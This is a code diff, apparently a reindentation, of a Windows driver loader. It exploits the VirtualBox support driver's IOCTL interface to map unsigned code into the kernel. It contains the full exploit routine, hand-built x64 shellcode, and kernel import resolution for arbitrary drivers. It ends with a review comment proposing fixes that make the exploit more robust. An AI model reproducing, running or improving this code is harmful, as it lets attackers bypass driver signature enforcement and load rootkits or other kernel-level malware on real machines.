@@ -163,43 +163,43 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase - ) + ULONG_PTR Image, + ULONG_PTR KernelImage, + ULONG_PTR KernelBase +) { - PIMAGE_OPTIONAL_HEADER popth; - ULONG_PTR ITableVA, *nextthunk; - PIMAGE_IMPORT_DESCRIPTOR ITable; - PIMAGE_THUNK_DATA pthunk; - PIMAGE_IMPORT_BY_NAME pname; - ULONG i; + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, *nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) - return; + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; - ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; - if (ITableVA == 0) - return; + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; - ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); - if (ITable->OriginalFirstThunk == 0) - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); - else - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); - for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { - nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); - if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { - pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); - } - else - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); - } + for (i = 0; pthunk->u1.Function != 0; 
i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } } /* 
@@ -211,160 +211,160 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize - ) + LPVOID Shellcode, + ULONG CodeSize +) { - SUPCOOKIE Cookie; - SUPLDROPEN OpenLdr; - DWORD bytesIO = 0; - RTR0PTR ImageBase = NULL; - ULONG_PTR paramOut; - PSUPLDRLOAD pLoadTask = NULL; - SUPSETVMFORFAST vmFast; - SUPLDRFREE ldrFree; - SIZE_T memIO; - WCHAR text[256]; + SUPCOOKIE Cookie; + SUPLDROPEN OpenLdr; + DWORD bytesIO = 0; + RTR0PTR ImageBase = NULL; + ULONG_PTR paramOut; + PSUPLDRLOAD pLoadTask = NULL; + SUPSETVMFORFAST vmFast; + SUPLDRFREE ldrFree; + SIZE_T memIO; + WCHAR text[256]; - while (g_hVBox != INVALID_HANDLE_VALUE) { - RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); - Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; - Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; - Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; - Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - Cookie.Hdr.rc = 0; - Cookie.u.In.u32ReqVersion = 0; - Cookie.u.In.u32MinVersion = 0x00070002; - RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); + while (g_hVBox != INVALID_HANDLE_VALUE) { + RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); + Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; + Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; + Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; + Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + Cookie.Hdr.rc = 0; + Cookie.u.In.u32ReqVersion = 0; + Cookie.u.In.u32MinVersion = 0x00070002; + RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, - &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, - SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); - break; - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, + &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, + SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call 
failed"), g_ConsoleOutput, TRUE); + break; + } - RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); - OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; - OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; - OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - OpenLdr.Hdr.rc = 0; - OpenLdr.u.In.cbImage = CodeSize; - RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); + RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); + OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; + OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; + OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + OpenLdr.Hdr.rc = 0; + OpenLdr.u.In.cbImage = CodeSize; + RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); - u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); + u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - ImageBase = OpenLdr.u.Out.pvImageBase; + ImageBase = OpenLdr.u.Out.pvImageBase; - memIO = PAGE_SIZE + CodeSize; - 
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + memIO = PAGE_SIZE + CodeSize; + NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - if (pLoadTask == NULL) - break; + if (pLoadTask == NULL) + break; - pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - pLoadTask->Hdr.cbIn = - (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; - pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; - pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; - pLoadTask->Hdr.rc = 0; - pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; - pLoadTask->u.In.pvImageBase = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; - RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); - pLoadTask->u.In.cbImage = CodeSize; + pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + pLoadTask->Hdr.cbIn = + (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; + pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; + pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; + pLoadTask->Hdr.rc = 0; + pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; + pLoadTask->u.In.pvImageBase = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; + RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); + pLoadTask->u.In.cbImage = CodeSize; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, - pLoadTask, pLoadTask->Hdr.cbIn, - pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) - { - 
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase, _strend(text)); - _strcat(text, TEXT(", size = 0x")); - ultohex(CodeSize, _strend(text)); + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, + pLoadTask, pLoadTask->Hdr.cbIn, + pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase, _strend(text)); + _strcat(text, TEXT(", size = 0x")); + ultohex(CodeSize, _strend(text)); - _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); - vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - vmFast.Hdr.rc = 0; - vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; - vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; - vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; + RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); + vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + vmFast.Hdr.rc = 0; + vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; + vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; + vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, - 
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, - &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); + } - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); - paramOut = 0; - DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, - NULL, 0, - ¶mOut, sizeof(paramOut), &bytesIO, NULL); + paramOut = 0; + DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, + NULL, 0, + ¶mOut, sizeof(paramOut), &bytesIO, NULL); - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); - ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; - ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; - ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - ldrFree.Hdr.rc = 0; - ldrFree.u.In.pvImageBase = ImageBase; + RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); + ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; + ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; + ldrFree.Hdr.fFlags = 
SUPREQHDR_FLAGS_DEFAULT; + ldrFree.Hdr.rc = 0; + ldrFree.u.In.pvImageBase = ImageBase; - DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, - &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); + DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); - break; - } + break; + } - if (pLoadTask != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); - } + if (pLoadTask != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); + } - if (g_hVBox != INVALID_HANDLE_VALUE) { - CloseHandle(g_hVBox); - g_hVBox = INVALID_HANDLE_VALUE; - } + if (g_hVBox != INVALID_HANDLE_VALUE) { + CloseHandle(g_hVBox); + g_hVBox = INVALID_HANDLE_VALUE; + } } /* 
@@ -376,129 +376,129 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName - ) + LPWSTR lpDriverFullName +) { - UINT result = (UINT)-1; - ULONG isz; - SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; - HMODULE Image = NULL; - PIMAGE_NT_HEADERS FileHeader; - PBYTE Buffer = NULL; - UNICODE_STRING uStr; - ANSI_STRING routineName; - NTSTATUS status; - WCHAR text[256]; + UINT result = (UINT)-1; + ULONG isz; + SIZE_T memIO; + ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + HMODULE Image = NULL; + PIMAGE_NT_HEADERS FileHeader; + PBYTE Buffer = NULL; + UNICODE_STRING uStr; + ANSI_STRING routineName; + NTSTATUS status; + WCHAR text[256]; - KernelBase = supGetNtOsBase(); - while (KernelBase != 0) { + KernelBase = supGetNtOsBase(); + while (KernelBase != 0) { - _strcpy(text, TEXT("Ldr: Kernel base = 0x")); - u64tohex(KernelBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Kernel base = 0x")); + u64tohex(KernelBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - RtlSecureZeroMemory(&uStr, sizeof(uStr)); - RtlInitUnicodeString(&uStr, lpDriverFullName); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); - if ((!NT_SUCCESS(status)) || (Image == NULL)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); - u64tohex((ULONG_PTR)Image, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlSecureZeroMemory(&uStr, sizeof(uStr)); + RtlInitUnicodeString(&uStr, lpDriverFullName); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); + if ((!NT_SUCCESS(status)) || (Image == NULL)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, 
TEXT("Ldr: Input driver file loaded at 0x")); + u64tohex((ULONG_PTR)Image, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - FileHeader = RtlImageNtHeader(Image); - if (FileHeader == NULL) - break; + FileHeader = RtlImageNtHeader(Image); + if (FileHeader == NULL) + break; - isz = FileHeader->OptionalHeader.SizeOfImage; + isz = FileHeader->OptionalHeader.SizeOfImage; - cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); - status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); - if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); - u64tohex(KernelImage, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); + if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); + u64tohex(KernelImage, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "ExAllocatePoolWithTag"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); - if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); - u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + 
RtlInitString(&routineName, "ExAllocatePoolWithTag"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); + if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); + u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - memIO = isz + PAGE_SIZE; - NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); - if (Buffer == NULL) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); - 
u64tohex((ULONG_PTR)Buffer, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + memIO = isz + PAGE_SIZE; + NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (Buffer == NULL) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); + u64tohex((ULONG_PTR)Buffer, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - // mov rcx, ExAllocatePoolWithTag - // mov rdx, PsCreateSystemThread + // mov rcx, ExAllocatePoolWithTag + // mov rdx, PsCreateSystemThread - Buffer[0x00] = 0x48; // mov rcx, xxxxx - Buffer[0x01] = 0xb9; - *((PULONG_PTR)&Buffer[2]) = - KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x00] = 0x48; // mov rcx, xxxxx + Buffer[0x01] = 0xb9; + *((PULONG_PTR)&Buffer[2]) = + KernelBase + (xExAllocatePoolWithTag - KernelImage); + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + RtlCopyMemory(Buffer + 0x14, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + RtlCopyMemory(Buffer + scDataOffset, Image, isz); - cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); + TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); - cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), 
g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); - result = 0; - break; - } + cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); + TDLExploit(Buffer, isz + PAGE_SIZE); + result = 0; + break; + } - if (Buffer != NULL) { - memIO = 0; - NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); - } + if (Buffer != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); + } - return result; + return result; } /* 
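Review bot: `isz` is taken straight from the input file's `OptionalHeader.SizeOfImage`, and `memIO = isz + PAGE_SIZE` is ULONG arithmetic, so a SizeOfImage above `0xFFFFF000` wraps to a small allocation while `RtlCopyMemory(Buffer + scDataOffset, Image, isz)` still copies `isz` bytes and the same wrapped size is then passed to `TDLExploit`; a guard right after reading the header, `if (isz == 0 || isz > MAXULONG - PAGE_SIZE) break;`, closes that (whether `scDataOffset` itself stays within the extra `PAGE_SIZE` cannot be checked here, it is defined outside the hunk). The `NtAllocateVirtualMemory` status is discarded and only `Buffer == NULL` is tested, which works solely because `Buffer` starts as NULL; `status = NtAllocateVirtualMemory(...); if (!NT_SUCCESS(status)) break;` says what is actually being checked. The operands written at `Buffer[2]` and `Buffer[0x0c]` are 8-byte immediates for an x64 `mov rcx/rdx`, so this function is 64-bit only; a `C_ASSERT(sizeof(ULONG_PTR) == 8);` at the top would make a 32-bit build fail at compile time instead of producing corrupt shellcode. The kernel addresses are computed as `KernelBase + (export - KernelImage)` from a user-mode `LdrLoadDll` of `ntoskrnl.exe`, which presumably assumes the on-disk file is the running kernel image — worth a one-line comment stating that assumption.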
